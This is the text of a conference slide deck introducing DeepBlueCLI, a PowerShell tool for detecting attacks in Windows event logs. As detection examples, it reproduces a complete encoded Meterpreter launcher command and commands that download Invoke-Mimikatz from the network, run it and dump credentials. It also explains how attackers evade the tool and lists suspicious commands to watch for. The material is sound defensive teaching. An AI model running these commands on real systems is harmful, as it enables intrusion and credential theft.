Você está na página 1de 45

DeepBlueCLI

C511

Introducing DeepBlueCLI
a PowerShell Module for Hunt
Teaming via Windows Event Logs

Eric Conrad (GSE #13)


@eric_conrad
Welcome!

• A copy of this talk is available


at htttp://ericconrad.com
• Includes a link to the
DeepBlueCLI GitHub site
o https://github.com/sans-blue-
team/DeepBlueCLI/
o Plus sample evtx files for all
major events discussed

Introducing DeepBlueCLI 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than


common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16 character service names containing only upper and
lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response
Introducing DeepBlueCLI 3
The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem


• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
Newer Malware and exploitation frameworks are migrating to
PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command
lines, or use the PowerShell WebClient.DownloadString Method
• Metasploit exploit target Powershell uses a long compressed and base64-
encoded PowerShell function loaded via cmd.exe

Introducing DeepBlueCLI 4
Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM
2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7m
PqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFi
mzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGj
xjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8Hp
D3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCP
P+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAy
CS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuu
r/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8Zy
NlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyW
zmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqV
KPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6
TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgf
jAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3T
bf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSd
SogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1
F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX
(New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecut
e=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnost
ics.Process]::Start($s);

Introducing DeepBlueCLI 5
Details

• Command is > 2400 bytes


• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell
function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Introducing DeepBlueCLI 6
Obfuscated PowerShell Function (after base64 -d and gzip -d)

Introducing DeepBlueCLI 7
Payload via Net.WebClient

Executing PowerSploit's Invoke-Mimikatz.ps1 via


Net.WebClient:
• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
(New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ma
ttifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"

Same method via short URL:


• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
(New-Object Net.WebClient).DownloadString('http://eic.me/17');
Invoke-Mimikatz -DumpCreds"
• Note that 'ps1' is not included in the command line

Introducing DeepBlueCLI 8
Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute


• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and
powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has
no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, yesterday
• There is no logging of process command lines or PowerShell commands by
default (hold that thought)
• Preventive and detective controls tend to allow and ignore these methods

Introducing DeepBlueCLI 9
Windows 7

• Windows 10 offers a wealth of security features


o Upgrade if you can
• This talk will focus on detecting malicious events on
Windows 7
o Windows 7 offers a "sweet spot" for clients
• All recommendations can be achieved with a Windows 7,
free Microsoft downloads, plus DeepBlueCLI
o All of these events (and more) can also be detected on Windows 8+

Introducing DeepBlueCLI 10
Log Full Command Line of all Processes

• Windows 7+ now supports logging full command line of all


launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced
Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit
Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Introducing DeepBlueCLI 11
Security Event 4688

• Security event 4688 is the highest value Windows event, IMO


o It can be used to reliably detect most modern post exploitation techniques
• There is one caveat: passwords may be disclosed via this event

Introducing DeepBlueCLI 12
Command Lines to Look For

Once logging full command lines: search for the following:


• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands
Introducing DeepBlueCLI 13
PowerShell Logging

PowerShell 4.o (default on PowerShell 5.0 (default on Windows 10)


Windows 8.1) includes additional adds more logging
logging

• Can be installed on Windows 7 SP1,


• Easy Windows 7 SP1 install takes multiple steps
• Event 4103 (Module Logging) • PowerShell v5 works on Windows 7SP1,
is very helpful but…
• DeepBlueCLI analyzes this o It's easy to break PowerShell logging
event
Introducing DeepBlueCLI 14
EMET

• Microsoft's EMET (Enhanced Mitigation Experience Toolkit) is a tool that


hardens Windows operating systems against a series of common exploit
tactics
o Free download from Microsoft
• Can be used to harden any version of Windows from XP and 2003 through
Windows 10 and Server 2012
o Older EMET versions are helpful for helping protect legacy operating systems such as
Windows XP and Windows Server 2003 (both end of life)
• In my testing: Windows 7 becomes a much harder target once EMET is
installed
• One thing I can recommend is anti-exploitation features. Microsoft EMET:
everybody ought to be turning that on – Rob Joyce, NSA
Introducing DeepBlueCLI 15
EMET Logs

Detect when EMET blocks Malware:


• PS> Get-WinEvent -FilterHashtable
@{LogName="application"; ProviderName="EMET"; id=2}

Introducing DeepBlueCLI 16
Introducing DeepBlueCLI – Beta 0.1

• Announcing the public release of DeepBlueCLI beta 0.1


• 100% PowerShell, runs on PowerShell 2.0 (Windows 7
default) or higher
o Can process PowerShell 4.0/5.0 event logs
• Can automatically detect all examples discussed
previously
o And more
• Processes local event logs, or evtx files

Introducing DeepBlueCLI 17
The Genesis of DeepBlueCLI

• Logging new process creation: easy


PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

• Logging processes launched with long command lines,


or commands that match certain malicious patterns:
requires scripting
• Telling clients "just write a script" usually results in
blank stares
o My keen powers of inference tell me that SOC scripters are rare
o OK, let me write the script…
Introducing DeepBlueCLI 18
The Script

• How hard could it be?


o Famous last words as you confidently submit a
DerbyCon CFP
• Some event data is well-formed and easily
parsed XML
• Other event data (*cough*, EMET, *cough*) is
a blob of text
o Fortunately, PowerShell has strong regex support
• In the end, each event requires custom code to:
o Detect malice
o Generate concise, actionable output

Introducing DeepBlueCLI 19
DeepBlueCLI – Design Notes

• Focus is on quality, not quantity


o All killer, no filler
o Not "shovel events into/out of a tool"
• Each reported event type has a specific malicious use case to
support it
• Initial tool focus is on high quality, actionable events, and the
underlying logic to detect them
• Output is currently basic text, but designed to be actionable
o Plan to add csv, xml and PowerShell object output modes in the future

Introducing DeepBlueCLI 20
Dodging DeepBlueCLI

• Many of the techniques used by DeepBlueCLI can be evaded


o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'

• Dodging all of the techniques is difficult


o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
• Many IT professionals commit the
perfect solution fallacy

Introducing DeepBlueCLI 21
Beware of the Perfect Attacker Fallacy

Paraphrasing collective feedback To quote Grace Hopper:


from my change-resistant clients: • The most damaging
• Well, APT will certainly use zero- phrase in the language
day exploits to bypass patching, is “We’ve always done
and also bypass EMET without it this way!”
triggering any EMET logs, and • Humans are allergic
inject malware into RAM to to change. They love to
avoid whitelisting, and create say, "We've always
realistic-looking registry run done it this way." I try
keys to maintain persistence, and to fight that. That's
phone home quite infrequently why I have a clock on
via Facebook to evade command- my wall that runs
and-control detection, and use counter-clockwise.1
perfect user-agents, and…

Introducing DeepBlueCLI 22
DeepBlueCLI: Current List of Detected Events

• Long command lines • EMET Blocks


• Long PowerShell commands • Applocker Blocks
• Regex matching PowerShell • Suspicious service creation
and CL • Service errors
• Base64 encoded CL or • User creation
PowerShell
• Users added to Local/Global
• Compressed/Base64 encoded Admin group
CL or Powershell
• High number of logon failures
• PowerShell Net.WebClient

Introducing DeepBlueCLI 23
DeepBlueCLI: Regex Matching Command Lines

Regular expression matching PowerShell and command


lines via simple CSV file

Introducing DeepBlueCLI 24
DeepBlueCLI - Whitelist

Some benign commands create giant command lines, for example:


"C:\Program Files\Google\Update\GoogleUpdate.exe" /ping
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB2ZXJzaW9uPSIxLjMuMzEuNSIgc2h
lbGxfdmVyc2lvbj0iMS4zLjI5LjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODM4NDRDNEEtOUU5OS00OTZBLTk4N0MtMkU0REE3NEI0QT
ZDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntCOTZCM0VCQi0yMzkwLTRBNTctQUFBMC05MEMxNjJFOUQ5QTB9IiBkZ
WR1cD0iY3IiPjxodyBwaHlzbWVtb3J5PSIzIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEi
IGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSI2LjEiIHNwPSJTZXJ2aWNlIFBhY2sgMSIgYXJjaD0ieDg2Ii8-
PGFwcCBhcHBpZD0iezREQzhCNENBLTFCREEtNDgzRS1CNUZBLUQzQzEyRTE1QjYyRH0iIHZlcnNpb249IjUyLjAuMjc0My4xMTYiIG5leHR2ZXJ
zaW9uPSI1My4wLjI3ODUuMTE2IiBhcD0iLW11bHRpLWNocm9tZSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGNvaG9ydD0iMTpiOD
oiIGNvaG9ydG5hbWU9IlN0YWJsZSI-
PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXB
lPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3
VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9yZWRpcmVjdG9yLmd2dDEuY
29tL2VkZ2VkbC9yZWxlYXNlMi80MDl2cGRuaGlrem5rd3BnOGEwZTdnZ2FiZWVtbG5qOGNhem4xczRrcnM5aW52ZjZkbHo0MXltcWtyMHlkY2Zj
emFlOGd3ZXZ4OGVnNndkZnl4czhldThna3E2OXpjYXloazUvNTMuMC4yNzg1LjExNl81Mi4wLjI3NDMuMTE2X2Nocm9tZV91cGRhdGVyLmV4ZSI
gZG93bmxvYWRlZD0iMTYzMzM0MDAiIHRvdGFsPSIxNjMzMzQwMCIgZG93bmxvYWRfdGltZV9tcz0iMzY5MzIzMCIvPjxldmVudCBldmVudHR5cG
U9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-
PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXB
lPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2
tfdGltZV9tcz0iMTk2OSIgZG93bmxvYWRfdGltZV9tcz0iMzY5Mzg4NiIgZG93bmxvYWRlZD0iMTYzMzM0MDAiIHRvdGFsPSIxNjMzMzQwMCIga
W5zdGFsbF90aW1lX21zPSIyNTA2MiIvPjwvYXBwPjwvcmVxdWVzdD4

DeepBlueCLI supports a whitelist to ignore these commands


Introducing DeepBlueCLI 25
DeepBlue CLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-


encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style)
it will also uncompress them
• In both cases: it will then scan the normalized command
for malicious regular expression matches

Introducing DeepBlueCLI 26
Use Case: DeepBlueCLI vs. SMB Password Guessing

This Metasploit SMB password guessing attack generates


3561 security event logs

DeepBlueCLI creates one entry


• Design goal: summarize, don't DoS
Introducing DeepBlueCLI 27
Use Case: PowerShell Empire (thx @harmj0y and @enigma0x3)

• PowerShell Empire is quite


stealthy
• By default: zero Windows
events are generated by the
launcher.bat payload on the
right
• Once enabled: security
event 4688 is quite helpful

Introducing DeepBlueCLI 28
DeepBlueCLI vs. PowerShell Empire

wd

Introducing DeepBlueCLI 29
Use Case: Metasploit psexec

Exploit target: Native


upload

Introducing DeepBlueCLI 30
Meterpreter getsystem

Attacker then escalated privileges and dumped the hashes:

Introducing DeepBlueCLI 31
DeepBlueCLI vs. Metasploit psexec with Native upload

Detection of Metasploit-style service name and Native


upload EXE:

DeepBlueCLI also detects use of Meterpreter's "getsystem":

Introducing DeepBlueCLI 32
Use Case: Metasploit psexec, exploit target PowerShell

Introducing DeepBlueCLI 33
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, system log

Introducing DeepBlueCLI 34
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, security log

Introducing DeepBlueCLI 35
Use Case: PowerSploit (thx @mattifestation, @obscuresec and
@JosephBialek)

Introducing DeepBlueCLI 36
DeepBlueCLI vs PowerSploit

First command used short URL, second used PowerSploit's


GitHub site

Introducing DeepBlueCLI 37
Use Case: PSAttack (thx @jaredhaight)

PSAttack "…doesn't rely on


powershell.exe. Instead it calls
powershell directly through
the .NET framework. This
makes it harder for
enterprises to block."
• https://github.com/jaredhaight
/PSAttack

Introducing DeepBlueCLI 38
DeepBlueCLI vs. PSAttack

DeepBlueCLI detects PSAttack's use of csc.exe (C#


Compiler) and cvtres.exe (Resource File To COFF
Object Conversion Utility)

Introducing DeepBlueCLI 39
Use Case: Invoke-Obfuscation (thx @danielhbohannon)

Introducing DeepBlueCLI 40
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow:

• In the meantime, I noticed it used a lot of special characters,


o Specifically the "+" to join the obfuscated strings together
• So I updated DeepBlueCLI
• And I created a POC "exploit"…
Introducing DeepBlueCLI 41
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow. In the meantime,


I created a POC

Introducing DeepBlueCLI 42
DeepBlueCLI: Next Steps

• Next major update will split DeepBlueCLI into two parts:


• Detection engine:
o Outputting to XML or PowerShell Object format
• Reporting engine:
o Inputs results from detection engine
o Output text, XML or CSV
• Also plans to integrate into SOF-ELK

Introducing DeepBlueCLI 43
Demo Time!

Introducing DeepBlueCLI 44
Thank you!

• Contact me on Twitter:
o @eric_conrad
• Copy of this talk is available
at http://ericconrad.com
• Check out Security 511 for
more monitoring/operational
goodness: http://sec511.com

Introducing DeepBlueCLI 45